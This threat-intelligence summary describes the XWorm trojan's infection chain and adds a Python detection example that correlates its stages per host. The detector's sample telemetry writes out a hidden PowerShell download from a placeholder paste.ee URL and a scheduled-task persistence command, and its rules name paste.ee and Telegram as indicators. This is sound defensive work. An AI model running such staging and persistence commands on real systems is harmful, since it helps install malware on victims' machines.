XWorm: Analysis of Latest Version and Execution Flow
Essential information
- Published: 03/10/2024 15:16
- Modified: 03/10/2024 16:21
- Tags: 2024-10-03, evasion techniques, infection chain, process injection, reflective loading, remote access, telegram notification, xworm
- Related entities: 8 observables, 10 techniques (MITRE), 1 malware
Description
XWorm, a versatile tool discovered in 2022, enables attackers to access sensitive information, gain remote access, and deploy additional malware. The latest version's infection chain begins with a Windows Script File downloading a PowerShell script from paste.ee. This script creates multiple files, establishes persistence through a scheduled task, and notifies the attacker via Telegram. The malware employs evasive techniques, including reflective code loading of a DLL loader, which then injects XWorm into a legitimate process. New features include plugin removal and a network command reporting response time. The analysis covers the entire execution flow, from initial infection to the final payload execution, highlighting the sophisticated nature of this threat.
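The infection chain summarised above (script host launching PowerShell that fetches from paste.ee, a scheduled task for persistence, and a Telegram notification) maps onto a handful of endpoint telemetry checks. The following is an added detection example, not code from the original report or from the XWorm analysis it describes. It assumes a simplified record shape for process-creation and outbound-network events; the stage names, the host names, the placeholder paste.ee URL and the file paths are all constructed for this illustration.

```python
"""Detection example for the XWorm infection-chain summary above.

Added illustration, not code from the original report. It assumes a
simplified endpoint-telemetry record (process creation and outbound
network events); stage names and sample values are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str              # "process" or "network"
    host: str              # endpoint the event came from
    image: str             # process image name
    parent: str = ""       # parent image name (process events)
    cmdline: str = ""      # full command line (process events)
    dest: str = ""         # destination hostname (network events)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPTING_PROCS = SCRIPT_HOSTS | POWERSHELL
PASTE_HOST = re.compile(r"https?://(www\.)?paste\.ee/", re.IGNORECASE)


def stage_wsf_to_powershell(e: Event) -> bool:
    """Stage 1: a Windows Script File host spawns PowerShell that references paste.ee."""
    return (e.kind == "process"
            and e.parent.lower() in SCRIPT_HOSTS
            and e.image.lower() in POWERSHELL
            and PASTE_HOST.search(e.cmdline) is not None)


def stage_schtasks_persistence(e: Event) -> bool:
    """Stage 2: PowerShell registers a scheduled task (schtasks /create)."""
    return (e.kind == "process"
            and e.parent.lower() in POWERSHELL
            and e.image.lower() == "schtasks.exe"
            and "/create" in e.cmdline.lower())


def stage_telegram_notify(e: Event) -> bool:
    """Stage 3: a scripting process contacts the Telegram Bot API host."""
    return (e.kind == "network"
            and e.image.lower() in SCRIPTING_PROCS
            and e.dest.lower() == "api.telegram.org")


# Chain order matters: a host hitting several stages is far more suspicious
# than one that only triggers a single, individually noisy rule.
STAGES = [
    ("wsf_to_powershell_paste", stage_wsf_to_powershell),
    ("schtasks_persistence", stage_schtasks_persistence),
    ("telegram_notify", stage_telegram_notify),
]


def detect(events):
    """Return {host: [stage names observed, in chain order]} for hosts hitting any stage."""
    seen = {}
    for e in events:
        for name, check in STAGES:
            if check(e):
                hits = seen.setdefault(e.host, [])
                if name not in hits:
                    hits.append(name)
    order = [n for n, _ in STAGES]
    # Sort so the report reads in chain order even if events arrived out of order
    return {h: sorted(s, key=order.index) for h, s in seen.items()}


def chain_suspected(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages of the chain were seen."""
    return sorted(h for h, s in detect(events).items() if len(s) >= min_stages)


# Constructed sample telemetry (not from the report); URL and paths are placeholders.
SAMPLE_EVENTS = [
    Event("process", "ws01", "wscript.exe", parent="explorer.exe",
          cmdline=r'wscript.exe "C:\Users\user\Downloads\document.wsf"'),
    Event("process", "ws01", "powershell.exe", parent="wscript.exe",
          cmdline='powershell.exe -NoProfile -WindowStyle Hidden -Command '
                  '"Invoke-WebRequest https://paste.ee/r/PLACEHOLDER"'),
    Event("process", "ws01", "schtasks.exe", parent="powershell.exe",
          cmdline=r'schtasks.exe /create /sc minute /mo 1 /tn "Updater" '
                  r'/tr "C:\Users\user\AppData\Roaming\loader.vbs" /f'),
    Event("network", "ws01", "powershell.exe", dest="api.telegram.org"),
    # Benign admin activity on another host: PowerShell run directly, no paste.ee, no task
    Event("process", "ws02", "powershell.exe", parent="explorer.exe",
          cmdline=r"powershell.exe -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for host, stages in detect(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(stages))
    print("chain suspected on:", chain_suspected(SAMPLE_EVENTS))
```

Each stage rule is deliberately narrow on the parent/child relationship rather than on the command line alone, because PowerShell and schtasks.exe are common in legitimate administration; correlating stages per host is what separates the chain described above from routine activity. The reflective-loading and process-injection steps that follow are in-memory and need memory or API-level telemetry rather than process-creation logs, so they are not covered by this example.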